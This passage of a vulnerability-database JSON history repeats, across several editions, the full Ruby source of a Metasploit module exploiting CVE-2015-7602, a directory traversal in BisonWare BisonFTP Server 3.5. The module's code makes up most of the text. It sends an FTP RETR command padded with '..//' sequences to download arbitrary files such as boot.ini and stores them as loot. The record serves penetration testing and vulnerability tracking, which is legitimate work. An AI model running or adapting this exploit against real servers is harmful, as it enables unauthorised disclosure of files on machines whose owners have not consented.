Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-08-28T19:33:32", "differentElements": ["modified", "published"], "edition": 40}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "191bc545a883cb2ca75e6977a6879512", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-08-28T21:36:24", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-08-28T21:36:24", "differentElements": ["modified", "published"], "edition": 41}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "16708d46df6270c8caa416b93d03724c", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-02-09T04:36:28", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2019-02-09T04:36:28", "differentElements": ["modified", "published"], "edition": 42}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "191bc545a883cb2ca75e6977a6879512", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-02-09T06:35:55", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2019-02-09T06:35:55", "differentElements": ["modified", "published"], "edition": 43}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "16708d46df6270c8caa416b93d03724c", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-02-11T04:44:20", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2019-02-11T04:44:20", "differentElements": ["modified", "published"], "edition": 44}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "191bc545a883cb2ca75e6977a6879512", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-02-11T06:41:35", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-02-11T06:41:35"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2019-02-11T06:41:35", "differentElements": ["modified", "published"], "edition": 45}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "16708d46df6270c8caa416b93d03724c", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-03-22T01:04:59", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-03-22T01:04:59"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2019-03-22T01:04:59", "differentElements": ["modified", "published"], "edition": 46}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "191bc545a883cb2ca75e6977a6879512", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-03-22T03:07:29", "history": 